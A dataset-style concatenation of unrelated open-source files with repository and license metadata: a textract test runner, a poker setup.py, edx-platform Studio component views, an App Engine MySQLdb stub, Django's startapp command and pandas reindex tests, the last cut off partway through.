""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ZeroDivisionError(ArithmeticError):
""" Second argument to a division or modulo operation was zero. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
| apache-2.0 |
shobhitmittal/textract | tests/run.py | 7 | 1076 | #!/usr/bin/env python
"""Run the test suite that is specified in the .travis.yml file
"""
import os
import subprocess
import yaml
from textract.colors import green, red
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def run_test(command):
wrapped_command = "cd %s && %s" % (root_dir, command)
pipe = subprocess.Popen(
wrapped_command, shell=True,
)
pipe.wait()
if pipe.returncode == 0:
print(green("TEST PASSED"))
else:
print(red("TEST FAILED"))
return pipe.returncode
# load the script tests from the .travis.yml file
with open(os.path.join(root_dir, '.travis.yml')) as stream:
travis_yml = yaml.load_all(stream.read())
config = travis_yml.next()
tests = config['script']
# run the tests
if isinstance(tests, (str, unicode)):
returncode = run_test(tests)
elif isinstance(tests, (list, tuple)):
returncode = 0
for test in tests:
returncode += run_test(test)
if returncode == 0:
print(green("ALL TESTS PASSED"))
else:
print(red("SOME TESTS FAILED, SEE ABOVE"))
| mit |
cleverpiggy/pokyr | setup.py | 1 | 1383 | """
Poker hand evaluating modules that provide fast enumerations.
Both C Extension module it's pure python analogies are included.
"""
from distutils.core import setup, Extension
import os
if not os.path.exists(os.path.join("src", "cpokertables.h")):
from poker import poker_lite
poker_lite.write_ctables(os.path.join("src", "cpokertables.h"))
sources = [
'src/build_table.c',
'src/cpokermod.c',
'src/deal.c',
'src/poker_heavy.c',
'src/poker_lite.c'
]
module = Extension(
'poker.cpoker',
sources=sources
)
long_description = "README at https://github.com/cleverpiggy/pokyr"
if os.path.exists("README.txt"):
with open("README.txt") as f:
long_description = f.read()
setup(
name='pokyr',
version='0.1.2',
ext_modules=[module],
packages=['poker'],
author='Allen Boyd Cunningham',
author_email='cleverfoundation@gmail.com',
url='https://github.com/cleverpiggy/pokyr',
description=__doc__,
long_description=long_description,
license='GPL',
classifiers=[
'Programming Language :: Python',
'Programming Language :: C',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Intended Audience :: Developers',
'Topic :: Games/Entertainment'
]
)
| gpl-3.0 |
wwj718/edx-platform | cms/djangoapps/contentstore/views/component.py | 4 | 14215 | from __future__ import absolute_import
import logging
from django.http import HttpResponseBadRequest, Http404
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_GET
from django.core.exceptions import PermissionDenied
from django.conf import settings
from opaque_keys import InvalidKeyError
from xmodule.modulestore.exceptions import ItemNotFoundError
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xblock.core import XBlock
from xblock.django.request import webob_to_django_response, django_to_webob_request
from xblock.exceptions import NoSuchHandlerError
from xblock.fields import Scope
from xblock.plugin import PluginMissingError
from xblock.runtime import Mixologist
from contentstore.utils import get_lms_link_for_item
from contentstore.views.helpers import get_parent_xblock, is_unit, xblock_type_display_name
from contentstore.views.item import create_xblock_info, add_container_page_publishing_info
from opaque_keys.edx.keys import UsageKey
from student.auth import has_course_author_access
from django.utils.translation import ugettext as _
from models.settings.course_grading import CourseGradingModel
__all__ = [
'container_handler',
'component_handler'
]
log = logging.getLogger(__name__)
# NOTE: This list is disjoint from ADVANCED_COMPONENT_TYPES
COMPONENT_TYPES = ['discussion', 'html', 'problem', 'video']
ADVANCED_COMPONENT_TYPES = sorted(set(name for name, class_ in XBlock.load_classes()) - set(COMPONENT_TYPES))
ADVANCED_PROBLEM_TYPES = settings.ADVANCED_PROBLEM_TYPES
CONTAINER_TEMPLATES = [
"basic-modal", "modal-button", "edit-xblock-modal",
"editor-mode-button", "upload-dialog",
"add-xblock-component", "add-xblock-component-button", "add-xblock-component-menu",
"add-xblock-component-menu-problem", "xblock-string-field-editor", "publish-xblock", "publish-history",
"unit-outline", "container-message", "license-selector",
]
def _advanced_component_types():
"""
Return advanced component types which can be created.
"""
return [c_type for c_type in ADVANCED_COMPONENT_TYPES if c_type not in settings.DEPRECATED_ADVANCED_COMPONENT_TYPES]
def _load_mixed_class(category):
"""
Load an XBlock by category name, and apply all defined mixins
"""
component_class = XBlock.load_class(category, select=settings.XBLOCK_SELECT_FUNCTION)
mixologist = Mixologist(settings.XBLOCK_MIXINS)
return mixologist.mix(component_class)
@require_GET
@login_required
def container_handler(request, usage_key_string):
"""
The restful handler for container xblock requests.
GET
html: returns the HTML page for editing a container
json: not currently supported
"""
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
try:
usage_key = UsageKey.from_string(usage_key_string)
except InvalidKeyError: # Raise Http404 on invalid 'usage_key_string'
raise Http404
with modulestore().bulk_operations(usage_key.course_key):
try:
course, xblock, lms_link, preview_lms_link = _get_item_in_course(request, usage_key)
except ItemNotFoundError:
return HttpResponseBadRequest()
component_templates = get_component_templates(course)
ancestor_xblocks = []
parent = get_parent_xblock(xblock)
action = request.REQUEST.get('action', 'view')
is_unit_page = is_unit(xblock)
unit = xblock if is_unit_page else None
while parent and parent.category != 'course':
if unit is None and is_unit(parent):
unit = parent
ancestor_xblocks.append(parent)
parent = get_parent_xblock(parent)
ancestor_xblocks.reverse()
assert unit is not None, "Could not determine unit page"
subsection = get_parent_xblock(unit)
assert subsection is not None, "Could not determine parent subsection from unit " + unicode(unit.location)
section = get_parent_xblock(subsection)
assert section is not None, "Could not determine ancestor section from unit " + unicode(unit.location)
# Fetch the XBlock info for use by the container page. Note that it includes information
# about the block's ancestors and siblings for use by the Unit Outline.
xblock_info = create_xblock_info(xblock, include_ancestor_info=is_unit_page)
if is_unit_page:
add_container_page_publishing_info(xblock, xblock_info)
# need to figure out where this item is in the list of children as the
# preview will need this
index = 1
for child in subsection.get_children():
if child.location == unit.location:
break
index += 1
return render_to_response('container.html', {
'context_course': course, # Needed only for display of menus at top of page.
'action': action,
'xblock': xblock,
'xblock_locator': xblock.location,
'unit': unit,
'is_unit_page': is_unit_page,
'subsection': subsection,
'section': section,
'new_unit_category': 'vertical',
'ancestor_xblocks': ancestor_xblocks,
'component_templates': component_templates,
'xblock_info': xblock_info,
'draft_preview_link': preview_lms_link,
'published_preview_link': lms_link,
'templates': CONTAINER_TEMPLATES
})
else:
return HttpResponseBadRequest("Only supports HTML requests")
def get_component_templates(courselike, library=False):
"""
Returns the applicable component templates that can be used by the specified course or library.
"""
def create_template_dict(name, cat, boilerplate_name=None, tab="common", hinted=False):
"""
Creates a component template dict.
Parameters
display_name: the user-visible name of the component
category: the type of component (problem, html, etc.)
boilerplate_name: name of boilerplate for filling in default values. May be None.
hinted: True if hinted problem else False
tab: common(default)/advanced, which tab it goes in
"""
return {
"display_name": name,
"category": cat,
"boilerplate_name": boilerplate_name,
"hinted": hinted,
"tab": tab
}
component_display_names = {
'discussion': _("Discussion"),
'html': _("HTML"),
'problem': _("Problem"),
'video': _("Video")
}
component_templates = []
categories = set()
# The component_templates array is in the order of "advanced" (if present), followed
# by the components in the order listed in COMPONENT_TYPES.
component_types = COMPONENT_TYPES[:]
# Libraries do not support discussions
if library:
component_types = [component for component in component_types if component != 'discussion']
for category in component_types:
templates_for_category = []
component_class = _load_mixed_class(category)
# add the default template with localized display name
# TODO: Once mixins are defined per-application, rather than per-runtime,
# this should use a cms mixed-in class. (cpennington)
display_name = xblock_type_display_name(category, _('Blank')) # this is the Blank Advanced problem
templates_for_category.append(create_template_dict(display_name, category, None, 'advanced'))
categories.add(category)
# add boilerplates
if hasattr(component_class, 'templates'):
for template in component_class.templates():
filter_templates = getattr(component_class, 'filter_templates', None)
if not filter_templates or filter_templates(template, courselike):
# Tab can be 'common' 'advanced'
# Default setting is common/advanced depending on the presence of markdown
tab = 'common'
if template['metadata'].get('markdown') is None:
tab = 'advanced'
hinted = template.get('hinted', False)
templates_for_category.append(
create_template_dict(
_(template['metadata'].get('display_name')), # pylint: disable=translation-of-non-string
category,
template.get('template_id'),
tab,
hinted,
)
)
# Add any advanced problem types
if category == 'problem':
for advanced_problem_type in ADVANCED_PROBLEM_TYPES:
component = advanced_problem_type['component']
boilerplate_name = advanced_problem_type['boilerplate_name']
try:
component_display_name = xblock_type_display_name(component)
except PluginMissingError:
log.warning('Unable to load xblock type %s to read display_name', component, exc_info=True)
else:
templates_for_category.append(
create_template_dict(component_display_name, component, boilerplate_name, 'advanced')
)
categories.add(component)
component_templates.append({
"type": category,
"templates": templates_for_category,
"display_name": component_display_names[category]
})
# Libraries do not support advanced components at this time.
if library:
return component_templates
# Check if there are any advanced modules specified in the course policy.
# These modules should be specified as a list of strings, where the strings
# are the names of the modules in ADVANCED_COMPONENT_TYPES that should be
# enabled for the course.
course_advanced_keys = courselike.advanced_modules
advanced_component_templates = {"type": "advanced", "templates": [], "display_name": _("Advanced")}
advanced_component_types = _advanced_component_types()
# Set component types according to course policy file
if isinstance(course_advanced_keys, list):
for category in course_advanced_keys:
if category in advanced_component_types and category not in categories:
# boilerplates not supported for advanced components
try:
component_display_name = xblock_type_display_name(category, default_display_name=category)
advanced_component_templates['templates'].append(
create_template_dict(
component_display_name,
category
)
)
categories.add(category)
except PluginMissingError:
# dhm: I got this once but it can happen any time the
# course author configures an advanced component which does
# not exist on the server. This code here merely
# prevents any authors from trying to instantiate the
# non-existent component type by not showing it in the menu
log.warning(
"Advanced component %s does not exist. It will not be added to the Studio new component menu.",
category
)
else:
log.error(
"Improper format for course advanced keys! %s",
course_advanced_keys
)
if len(advanced_component_templates['templates']) > 0:
component_templates.insert(0, advanced_component_templates)
return component_templates
@login_required
def _get_item_in_course(request, usage_key):
"""
Helper method for getting the old location, containing course,
item, lms_link, and preview_lms_link for a given locator.
Verifies that the caller has permission to access this item.
"""
# usage_key's course_key may have an empty run property
usage_key = usage_key.replace(course_key=modulestore().fill_in_run(usage_key.course_key))
course_key = usage_key.course_key
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course = modulestore().get_course(course_key)
item = modulestore().get_item(usage_key, depth=1)
lms_link = get_lms_link_for_item(item.location)
preview_lms_link = get_lms_link_for_item(item.location, preview=True)
return course, item, lms_link, preview_lms_link
@login_required
def component_handler(request, usage_key_string, handler, suffix=''):
"""
Dispatch an AJAX action to an xblock
Args:
usage_id: The usage-id of the block to dispatch to
handler (str): The handler to execute
suffix (str): The remainder of the url to be passed to the handler
Returns:
:class:`django.http.HttpResponse`: The response from the handler, converted to a
django response
"""
usage_key = UsageKey.from_string(usage_key_string)
descriptor = modulestore().get_item(usage_key)
# Let the module handle the AJAX
req = django_to_webob_request(request)
try:
resp = descriptor.handle(handler, req, suffix)
except NoSuchHandlerError:
log.info("XBlock %s attempted to access missing handler %r", descriptor, handler, exc_info=True)
raise Http404
# unintentional update to handle any side effects of handle call
# could potentially be updating actual course data or simply caching its values
modulestore().update_item(descriptor, request.user.id)
return webob_to_django_response(resp)
| agpl-3.0 |
GdZ/scriptfile | software/googleAppEngine/google/appengine/api/rdbms_mysqldb.py | 5 | 2957 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Relational database API stub that uses the MySQLdb DB-API library.
Also see the rdbms module.
"""
import logging
import os
_POTENTIAL_SOCKET_LOCATIONS = (
'/tmp/mysql.sock',
'/var/run/mysqld/mysqld.sock',
'/var/lib/mysql/mysql.sock',
'/var/run/mysql/mysql.sock',
'/var/mysql/mysql.sock',
)
_connect_kwargs = {}
def SetConnectKwargs(**kwargs):
"""Sets the keyword args (host, user, etc) to pass to MySQLdb.connect()."""
global _connect_kwargs
_connect_kwargs = dict(kwargs)
def FindUnixSocket():
"""Find the Unix socket for MySQL by scanning some known locations.
Returns:
If found, the path to the Unix socket, otherwise, None.
"""
for path in _POTENTIAL_SOCKET_LOCATIONS:
if os.path.exists(path):
return path
try:
import google
import MySQLdb
from MySQLdb import *
__import__('MySQLdb.constants', globals(), locals(), ['*'])
except ImportError:
logging.warning('The rdbms API is not available because the MySQLdb '
'library could not be loaded.')
def connect(instance=None, database=None):
raise NotImplementedError(
'Unable to find the MySQLdb library. Please see the SDK '
'documentation for installation instructions.')
else:
def connect(instance=None, database=None, **kwargs):
merged_kwargs = _connect_kwargs.copy()
if database:
merged_kwargs['db'] = database
merged_kwargs.update(kwargs)
if 'password' in merged_kwargs:
merged_kwargs['passwd'] = merged_kwargs.pop('password')
host = merged_kwargs.get('host')
if ((not host or host == 'localhost') and
not merged_kwargs.get('unix_socket')):
socket = FindUnixSocket()
if socket:
merged_kwargs['unix_socket'] = socket
else:
logging.warning(
'Unable to find MySQL socket file. Use --mysql_socket to '
'specify its location manually.')
logging.info('Connecting to MySQL with kwargs %r', merged_kwargs)
try:
return MySQLdb.connect(**merged_kwargs)
except MySQLdb.Error:
logging.critical(
'MySQL connection failed! Ensure that you have provided correct '
'values for the --mysql_* flags when running dev_appserver.py')
raise
def set_instance(instance):
logging.info('set_instance() is a noop in dev_appserver.')
| mit |
yask123/django | django/core/management/commands/startapp.py | 513 | 1040 | from importlib import import_module
from django.core.management.base import CommandError
from django.core.management.templates import TemplateCommand
class Command(TemplateCommand):
help = ("Creates a Django app directory structure for the given app "
"name in the current directory or optionally in the given "
"directory.")
missing_args_message = "You must provide an application name."
def handle(self, **options):
app_name, target = options.pop('name'), options.pop('directory')
self.validate_name(app_name, "app")
# Check that the app_name cannot be imported.
try:
import_module(app_name)
except ImportError:
pass
else:
raise CommandError("%r conflicts with the name of an existing "
"Python module and cannot be used as an app "
"name. Please try another name." % app_name)
super(Command, self).handle('app', app_name, target, **options)
| bsd-3-clause |
GuessWhoSamFoo/pandas | pandas/tests/frame/test_axis_select_reindex.py | 1 | 44950 | # -*- coding: utf-8 -*-
from __future__ import print_function
from datetime import datetime
import numpy as np
import pytest
from pandas.compat import lrange, lzip, u
from pandas.errors import PerformanceWarning
import pandas as pd
from pandas import (
Categorical, DataFrame, Index, MultiIndex, Series, compat, date_range,
isna)
from pandas.tests.frame.common import TestData
import pandas.util.testing as tm
from pandas.util.testing import assert_frame_equal
class TestDataFrameSelectReindex(TestData):
# These are specific reindex-based tests; other indexing tests should go in
# test_indexing
def test_drop_names(self):
df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
index=['a', 'b', 'c'],
columns=['d', 'e', 'f'])
df.index.name, df.columns.name = 'first', 'second'
df_dropped_b = df.drop('b')
df_dropped_e = df.drop('e', axis=1)
df_inplace_b, df_inplace_e = df.copy(), df.copy()
df_inplace_b.drop('b', inplace=True)
df_inplace_e.drop('e', axis=1, inplace=True)
for obj in (df_dropped_b, df_dropped_e, df_inplace_b, df_inplace_e):
assert obj.index.name == 'first'
assert obj.columns.name == 'second'
assert list(df.columns) == ['d', 'e', 'f']
pytest.raises(KeyError, df.drop, ['g'])
pytest.raises(KeyError, df.drop, ['g'], 1)
# errors = 'ignore'
dropped = df.drop(['g'], errors='ignore')
expected = Index(['a', 'b', 'c'], name='first')
tm.assert_index_equal(dropped.index, expected)
dropped = df.drop(['b', 'g'], errors='ignore')
expected = Index(['a', 'c'], name='first')
tm.assert_index_equal(dropped.index, expected)
dropped = df.drop(['g'], axis=1, errors='ignore')
expected = Index(['d', 'e', 'f'], name='second')
tm.assert_index_equal(dropped.columns, expected)
dropped = df.drop(['d', 'g'], axis=1, errors='ignore')
expected = Index(['e', 'f'], name='second')
tm.assert_index_equal(dropped.columns, expected)
# GH 16398
dropped = df.drop([], errors='ignore')
expected = Index(['a', 'b', 'c'], name='first')
tm.assert_index_equal(dropped.index, expected)
def test_drop_col_still_multiindex(self):
arrays = [['a', 'b', 'c', 'top'],
['', '', '', 'OD'],
['', '', '', 'wx']]
tuples = sorted(zip(*arrays))
index = MultiIndex.from_tuples(tuples)
df = DataFrame(np.random.randn(3, 4), columns=index)
del df[('a', '', '')]
assert(isinstance(df.columns, MultiIndex))
def test_drop(self):
simple = DataFrame({"A": [1, 2, 3, 4], "B": [0, 1, 2, 3]})
assert_frame_equal(simple.drop("A", axis=1), simple[['B']])
assert_frame_equal(simple.drop(["A", "B"], axis='columns'),
simple[[]])
assert_frame_equal(simple.drop([0, 1, 3], axis=0), simple.loc[[2], :])
assert_frame_equal(simple.drop(
[0, 3], axis='index'), simple.loc[[1, 2], :])
pytest.raises(KeyError, simple.drop, 5)
pytest.raises(KeyError, simple.drop, 'C', 1)
pytest.raises(KeyError, simple.drop, [1, 5])
pytest.raises(KeyError, simple.drop, ['A', 'C'], 1)
# errors = 'ignore'
assert_frame_equal(simple.drop(5, errors='ignore'), simple)
assert_frame_equal(simple.drop([0, 5], errors='ignore'),
simple.loc[[1, 2, 3], :])
assert_frame_equal(simple.drop('C', axis=1, errors='ignore'), simple)
assert_frame_equal(simple.drop(['A', 'C'], axis=1, errors='ignore'),
simple[['B']])
# non-unique - wheee!
nu_df = DataFrame(lzip(range(3), range(-3, 1), list('abc')),
columns=['a', 'a', 'b'])
assert_frame_equal(nu_df.drop('a', axis=1), nu_df[['b']])
assert_frame_equal(nu_df.drop('b', axis='columns'), nu_df['a'])
assert_frame_equal(nu_df.drop([]), nu_df) # GH 16398
nu_df = nu_df.set_index(pd.Index(['X', 'Y', 'X']))
nu_df.columns = list('abc')
assert_frame_equal(nu_df.drop('X', axis='rows'), nu_df.loc[["Y"], :])
assert_frame_equal(nu_df.drop(['X', 'Y'], axis=0), nu_df.loc[[], :])
# inplace cache issue
# GH 5628
df = pd.DataFrame(np.random.randn(10, 3), columns=list('abc'))
expected = df[~(df.b > 0)]
df.drop(labels=df[df.b > 0].index, inplace=True)
assert_frame_equal(df, expected)
def test_drop_multiindex_not_lexsorted(self):
# GH 11640
# define the lexsorted version
lexsorted_mi = MultiIndex.from_tuples(
[('a', ''), ('b1', 'c1'), ('b2', 'c2')], names=['b', 'c'])
lexsorted_df = DataFrame([[1, 3, 4]], columns=lexsorted_mi)
assert lexsorted_df.columns.is_lexsorted()
# define the non-lexsorted version
not_lexsorted_df = DataFrame(columns=['a', 'b', 'c', 'd'],
data=[[1, 'b1', 'c1', 3],
[1, 'b2', 'c2', 4]])
not_lexsorted_df = not_lexsorted_df.pivot_table(
index='a', columns=['b', 'c'], values='d')
not_lexsorted_df = not_lexsorted_df.reset_index()
assert not not_lexsorted_df.columns.is_lexsorted()
# compare the results
tm.assert_frame_equal(lexsorted_df, not_lexsorted_df)
expected = lexsorted_df.drop('a', axis=1)
with tm.assert_produces_warning(PerformanceWarning):
result = not_lexsorted_df.drop('a', axis=1)
tm.assert_frame_equal(result, expected)
def test_drop_api_equivalence(self):
# equivalence of the labels/axis and index/columns API's (GH12392)
df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
index=['a', 'b', 'c'],
columns=['d', 'e', 'f'])
res1 = df.drop('a')
res2 = df.drop(index='a')
tm.assert_frame_equal(res1, res2)
res1 = df.drop('d', 1)
res2 = df.drop(columns='d')
tm.assert_frame_equal(res1, res2)
res1 = df.drop(labels='e', axis=1)
res2 = df.drop(columns='e')
tm.assert_frame_equal(res1, res2)
res1 = df.drop(['a'], axis=0)
res2 = df.drop(index=['a'])
tm.assert_frame_equal(res1, res2)
res1 = df.drop(['a'], axis=0).drop(['d'], axis=1)
res2 = df.drop(index=['a'], columns=['d'])
tm.assert_frame_equal(res1, res2)
with pytest.raises(ValueError):
df.drop(labels='a', index='b')
with pytest.raises(ValueError):
df.drop(labels='a', columns='b')
with pytest.raises(ValueError):
df.drop(axis=1)
def test_merge_join_different_levels(self):
# GH 9455
# first dataframe
df1 = DataFrame(columns=['a', 'b'], data=[[1, 11], [0, 22]])
# second dataframe
columns = MultiIndex.from_tuples([('a', ''), ('c', 'c1')])
df2 = DataFrame(columns=columns, data=[[1, 33], [0, 44]])
# merge
columns = ['a', 'b', ('c', 'c1')]
expected = DataFrame(columns=columns, data=[[1, 11, 33], [0, 22, 44]])
with tm.assert_produces_warning(UserWarning):
result = pd.merge(df1, df2, on='a')
tm.assert_frame_equal(result, expected)
# join, see discussion in GH 12219
columns = ['a', 'b', ('a', ''), ('c', 'c1')]
expected = DataFrame(columns=columns,
data=[[1, 11, 0, 44], [0, 22, 1, 33]])
with tm.assert_produces_warning(UserWarning):
result = df1.join(df2, on='a')
tm.assert_frame_equal(result, expected)
def test_reindex(self):
newFrame = self.frame.reindex(self.ts1.index)
for col in newFrame.columns:
for idx, val in compat.iteritems(newFrame[col]):
if idx in self.frame.index:
if np.isnan(val):
assert np.isnan(self.frame[col][idx])
else:
assert val == self.frame[col][idx]
else:
assert np.isnan(val)
for col, series in compat.iteritems(newFrame):
assert tm.equalContents(series.index, newFrame.index)
emptyFrame = self.frame.reindex(Index([]))
assert len(emptyFrame.index) == 0
# Cython code should be unit-tested directly
nonContigFrame = self.frame.reindex(self.ts1.index[::2])
for col in nonContigFrame.columns:
for idx, val in compat.iteritems(nonContigFrame[col]):
if idx in self.frame.index:
if np.isnan(val):
assert np.isnan(self.frame[col][idx])
else:
assert val == self.frame[col][idx]
else:
assert np.isnan(val)
for col, series in compat.iteritems(nonContigFrame):
assert tm.equalContents(series.index, nonContigFrame.index)
# corner cases
# Same index, copies values but not index if copy=False
newFrame = self.frame.reindex(self.frame.index, copy=False)
assert newFrame.index is self.frame.index
# length zero
newFrame = self.frame.reindex([])
assert newFrame.empty
assert len(newFrame.columns) == len(self.frame.columns)
# length zero with columns reindexed with non-empty index
newFrame = self.frame.reindex([])
newFrame = newFrame.reindex(self.frame.index)
assert len(newFrame.index) == len(self.frame.index)
assert len(newFrame.columns) == len(self.frame.columns)
# pass non-Index
newFrame = self.frame.reindex(list(self.ts1.index))
tm.assert_index_equal(newFrame.index, self.ts1.index)
# copy with no axes
result = self.frame.reindex()
assert_frame_equal(result, self.frame)
assert result is not self.frame
def test_reindex_nan(self):
df = pd.DataFrame([[1, 2], [3, 5], [7, 11], [9, 23]],
index=[2, np.nan, 1, 5],
columns=['joe', 'jim'])
i, j = [np.nan, 5, 5, np.nan, 1, 2, np.nan], [1, 3, 3, 1, 2, 0, 1]
assert_frame_equal(df.reindex(i), df.iloc[j])
df.index = df.index.astype('object')
assert_frame_equal(df.reindex(i), df.iloc[j], check_index_type=False)
# GH10388
df = pd.DataFrame({'other': ['a', 'b', np.nan, 'c'],
'date': ['2015-03-22', np.nan,
'2012-01-08', np.nan],
'amount': [2, 3, 4, 5]})
df['date'] = pd.to_datetime(df.date)
df['delta'] = (pd.to_datetime('2015-06-18') - df['date']).shift(1)
left = df.set_index(['delta', 'other', 'date']).reset_index()
right = df.reindex(columns=['delta', 'other', 'date', 'amount'])
assert_frame_equal(left, right)
def test_reindex_name_remains(self):
s = Series(np.random.rand(10))
df = DataFrame(s, index=np.arange(len(s)))
i = Series(np.arange(10), name='iname')
df = df.reindex(i)
assert df.index.name == 'iname'
df = df.reindex(Index(np.arange(10), name='tmpname'))
assert df.index.name == 'tmpname'
s = Series(np.random.rand(10))
df = DataFrame(s.T, index=np.arange(len(s)))
i = Series(np.arange(10), name='iname')
df = df.reindex(columns=i)
assert df.columns.name == 'iname'
def test_reindex_int(self):
smaller = self.intframe.reindex(self.intframe.index[::2])
assert smaller['A'].dtype == np.int64
bigger = smaller.reindex(self.intframe.index)
assert bigger['A'].dtype == np.float64
smaller = self.intframe.reindex(columns=['A', 'B'])
assert smaller['A'].dtype == np.int64
def test_reindex_like(self):
other = self.frame.reindex(index=self.frame.index[:10],
columns=['C', 'B'])
assert_frame_equal(other, self.frame.reindex_like(other))
def test_reindex_columns(self):
new_frame = self.frame.reindex(columns=['A', 'B', 'E'])
tm.assert_series_equal(new_frame['B'], self.frame['B'])
assert np.isnan(new_frame['E']).all()
assert 'C' not in new_frame
# Length zero
new_frame = self.frame.reindex(columns=[])
assert new_frame.empty
def test_reindex_columns_method(self):
# GH 14992, reindexing over columns ignored method
df = DataFrame(data=[[11, 12, 13], [21, 22, 23], [31, 32, 33]],
index=[1, 2, 4],
columns=[1, 2, 4],
dtype=float)
# default method
result = df.reindex(columns=range(6))
expected = DataFrame(data=[[np.nan, 11, 12, np.nan, 13, np.nan],
[np.nan, 21, 22, np.nan, 23, np.nan],
[np.nan, 31, 32, np.nan, 33, np.nan]],
index=[1, 2, 4],
columns=range(6),
dtype=float)
assert_frame_equal(result, expected)
# method='ffill'
result = df.reindex(columns=range(6), method='ffill')
expected = DataFrame(data=[[np.nan, 11, 12, 12, 13, 13],
[np.nan, 21, 22, 22, 23, 23],
[np.nan, 31, 32, 32, 33, 33]],
index=[1, 2, 4],
columns=range(6),
dtype=float)
assert_frame_equal(result, expected)
# method='bfill'
result = df.reindex(columns=range(6), method='bfill')
expected = DataFrame(data=[[11, 11, 12, 13, 13, np.nan],
[21, 21, 22, 23, 23, np.nan],
[31, 31, 32, 33, 33, np.nan]],
index=[1, 2, 4],
columns=range(6),
dtype=float)
assert_frame_equal(result, expected)
def test_reindex_axes(self):
# GH 3317, reindexing by both axes loses freq of the index
df = DataFrame(np.ones((3, 3)),
index=[datetime(2012, 1, 1),
datetime(2012, 1, 2),
datetime(2012, 1, 3)],
columns=['a', 'b', 'c'])
time_freq = date_range('2012-01-01', '2012-01-03', freq='d')
some_cols = ['a', 'b']
index_freq = df.reindex(index=time_freq).index.freq
both_freq = df.reindex(index=time_freq, columns=some_cols).index.freq
seq_freq = df.reindex(index=time_freq).reindex(
columns=some_cols).index.freq
assert index_freq == both_freq
assert index_freq == seq_freq
def test_reindex_fill_value(self):
df = DataFrame(np.random.randn(10, 4))
# axis=0
result = df.reindex(lrange(15))
assert np.isnan(result.values[-5:]).all()
result = df.reindex(lrange(15), fill_value=0)
expected = df.reindex(lrange(15)).fillna(0)
assert_frame_equal(result, expected)
# axis=1
result = df.reindex(columns=lrange(5), fill_value=0.)
expected = df.copy()
expected[4] = 0.
assert_frame_equal(result, expected)
result = df.reindex(columns=lrange(5), fill_value=0)
expected = df.copy()
expected[4] = 0
assert_frame_equal(result, expected)
result = df.reindex(columns=lrange(5), fill_value='foo')
expected = df.copy()
expected[4] = 'foo'
assert_frame_equal(result, expected)
# reindex_axis
with tm.assert_produces_warning(FutureWarning):
result = df.reindex_axis(lrange(15), fill_value=0., axis=0)
expected = df.reindex(lrange(15)).fillna(0)
assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning):
result = df.reindex_axis(lrange(5), fill_value=0., axis=1)
expected = df.reindex(columns=lrange(5)).fillna(0)
assert_frame_equal(result, expected)
# other dtypes
df['foo'] = 'foo'
result = df.reindex(lrange(15), fill_value=0)
expected = df.reindex(lrange(15)).fillna(0)
assert_frame_equal(result, expected)
def test_reindex_dups(self):
# GH4746, reindex on duplicate index error messages
arr = np.random.randn(10)
df = DataFrame(arr, index=[1, 2, 3, 4, 5, 1, 2, 3, 4, 5])
# set index is ok
result = df.copy()
result.index = list(range(len(df)))
expected = DataFrame(arr, index=list(range(len(df))))
assert_frame_equal(result, expected)
# reindex fails
pytest.raises(ValueError, df.reindex, index=list(range(len(df))))
def test_reindex_axis_style(self):
# https://github.com/pandas-dev/pandas/issues/12392
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
expected = pd.DataFrame({"A": [1, 2, np.nan], "B": [4, 5, np.nan]},
index=[0, 1, 3])
result = df.reindex([0, 1, 3])
assert_frame_equal(result, expected)
result = df.reindex([0, 1, 3], axis=0)
assert_frame_equal(result, expected)
result = df.reindex([0, 1, 3], axis='index')
assert_frame_equal(result, expected)
def test_reindex_positional_warns(self):
# https://github.com/pandas-dev/pandas/issues/12392
df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
expected = pd.DataFrame({"A": [1., 2], 'B': [4., 5],
"C": [np.nan, np.nan]})
with tm.assert_produces_warning(FutureWarning):
result = df.reindex([0, 1], ['A', 'B', 'C'])
assert_frame_equal(result, expected)
def test_reindex_axis_style_raises(self):
# https://github.com/pandas-dev/pandas/issues/12392
df = pd.DataFrame({"A": [1, 2, 3], 'B': [4, 5, 6]})
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex([0, 1], ['A'], axis=1)
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex([0, 1], ['A'], axis='index')
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(index=[0, 1], axis='index')
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(index=[0, 1], axis='columns')
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(columns=[0, 1], axis='columns')
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(index=[0, 1], columns=[0, 1], axis='columns')
with pytest.raises(TypeError, match='Cannot specify all'):
df.reindex([0, 1], [0], ['A'])
# Mixing styles
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(index=[0, 1], axis='index')
with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
df.reindex(index=[0, 1], axis='columns')
# Duplicates
with pytest.raises(TypeError, match="multiple values"):
df.reindex([0, 1], labels=[0, 1])
def test_reindex_single_named_indexer(self):
# https://github.com/pandas-dev/pandas/issues/12392
df = pd.DataFrame({"A": [1, 2, 3], "B": [1, 2, 3]})
result = df.reindex([0, 1], columns=['A'])
expected = pd.DataFrame({"A": [1, 2]})
